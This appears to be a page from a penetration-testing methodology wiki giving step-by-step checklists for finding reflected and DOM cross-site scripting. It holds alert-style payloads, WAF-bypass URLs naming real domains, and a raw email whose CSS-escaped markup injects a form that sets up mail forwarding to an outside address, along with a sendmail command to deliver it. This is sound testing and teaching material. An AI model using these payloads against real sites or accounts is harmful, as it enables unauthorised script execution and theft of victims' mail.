Reflected Cross Site Scripting

Check List

Methodology

Black Box

XSS Reflected

1

Log in to any platform that allows creating or editing text-based pages (such as a Wiki or documentation system)

2

Create a new page

3

In the field for the page identifier or slug, enter javascript:

4

Configure the page as follows

Title: javascript:

Format: Markdown

Content: [XSS](.alert(1);)

5

Save or publish the page

6

After the page is created, click the link labeled “XSS” in the page content

7

If the system is vulnerable, the JavaScript code will execute (e.g., an alert(1) will appear)

XSS IN Email

1

Create a new text file (e.g. email.txt)

2

Put the following exact contents into the file (including headers and Content-type: text/html)

From: jouko@klikki.fi
To: jouko@hey.com
Subject: HackerOne test
MIME-Version: 1.0
Content-type: text/html

<style>
url(cid://\00003c\000027message-content\00003e\00003ctemplate\00003e\00003cstyle\00003exxx);
url(cid://\00003c/style\00003e\00003c/template\00003e\00003c/message-content\00003e\00003cform\000020action=/my/accounts/266986/forwardings/outbounds\000020data-controller=beacon\00003e\00003cinput\000020type=text\000020name=contact_outbound_forwarding[to_email_address]\000020value=joukop@gmail.com\00003e\00003c/form\00003exxx);
</style>
3

Send the email using sendmail on Linux as an example

/usr/sbin/sendmail -t < email.txt

(or use any other tool capable of sending raw MIME/HTML emails)

4

Open the recipient’s HEY account and load the sent email (refresh the inbox/viewer if needed)

5

Inspect the rendered HTML to find injected tags or form elements (e.g. injected <form ...> or <iframe ...>)

6

Observe any automatic behaviors triggered by the injected HTML (such as POST requests to create forwarding or a full-window iframe)

7

Repeat with the alternative payload examples from the report (iframe-based spoof or <script src=...> + hcaptcha payload) to verify other exploitation vectors

Reflected XSS In Marketing Reports Page

1

Log in to the store's website and complete the authentication process

2

Then go to the report section in your profile

3

When you enter the page, check the URL and find parameters like return_page_pathname= (may be different in each site)

4

Inject the parameter using the following payload and check if the code is executed or not

javascript:alert('XSS')
5

If it is implemented, we hit a vulnerability

Reflected cross site scripting (XSS) attacks

1

Enter a site and complete the authentication process

2

In the authentication process, make an error on one of the parameters so that the authentication process fails

3

If you encounter errmssg parameters in subsequent requests, inject xss-related payloads in these parameters

4

For example, like this request below

errmsg = [https://102.176.160.119:10443/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E]

DOM XSS

1

Bring up the Burp tool and make a request to the main page of the site

2

In the Response section, click on the search section and search for the word window.location.hash and check if it exists or not

3

If there is, inject the payload as shown below and see if it is reflected or not

https://www.example.com/#<img src=x onerror=alert('XSS')>

DOMXSS in redirect param

1

Logout website

2

Get the request using Burp and check the request

3

In the requests review, if you find a request like the one below, inject the payload

https://subdomain.example.net/?redirect=javascript:prompt(document.domain)%2f%2f
4

Log in through email

XSS Reflected in Redirect_url

1

Log in to the site and complete the registration process

2

Trace the registration process using Burp and inspect the parameters

3

If you see a parameter called redirect_url, inject the following payload as shown below:

https://example.net/resign_request/success?next_url=javascript%3Aalert%2F**%2F(document.domain)
4

If the code is reflected, the vulnerability has occurred

Payload For WAF Bypass

1
https://www.example.com.br/testing%2522%80%2520accesskey='x'%2520onclick='confirm%601%60'
2
https://www.example.com.br/testing%2522%FF%2520accesskey='x'%2520onclick='confirm%601%60'
3
https://www.starbucks.com.br/testing%80%2522%2520accesskey='x'%2520onclick='confirm%601%60'

Location Information Parameter

1

Log in to your account and profile on the target site

2

Go to the general section of your account and enter the street address, city, and the following payload

/"><!--><svg/onload=alert(document.domain)>)
3

After injection, save and log in to see your location information and live view

4

For example, something like the path below (keep in mind that this path can be different for each site)

https://example.com/user/dashboards/live

White Box

Cheat Sheet

PreviousInput ValidationNextStored Cross Site Scripting

Last updated